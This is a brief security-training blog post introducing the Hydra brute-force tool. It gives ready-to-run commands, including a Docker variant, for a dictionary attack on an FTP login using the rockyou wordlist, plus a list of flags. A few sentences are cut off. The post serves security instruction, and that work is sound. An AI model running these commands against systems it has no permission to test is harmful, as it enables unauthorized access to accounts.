Hacking Tool: hydraposted in security on • by Wouter Van Schandevijl
Show how easy it would be to gain unauthorized access to a system remotely.
Hydra is a brute-force tool to perform dictionary attacks against protocols such as Ftp, Http(s), Cisco, Oracle, Postgres, SMTP, Telnet, SSH and many more.
vanhauser-thc/thc-hydra : hydra
hydra -l user -P rockyou.txt ftp://192.168.1.6 -t8 -v -I
-l user: the vulnerable username
-L file: load several logins from
-P file: the wordlist file
-t8: amount of parallel attempts (default 16)
-v: verbose mode
-V: show login+pass for each attempt
-d: debug mode
-I: ignore an existing restore file
This assumes that you have a
wordlist.txt file in your working directory.
# Display all options docker run --rm vanhauser/hydra -h # Map a volume with a wordlist docker run -v $(pwd):/data --rm vanhauser/hydra -l user -P /data/wordlist.txt ftp://ip -t8 -v -I
Wordlists contain common passwords.
A famous one is
Whenever you figure out that a certain protocol and user has a weak password, it’s time to whip out Hydra! Check the Security Audit Blog during itenium’s Security Bootcamp for such clue!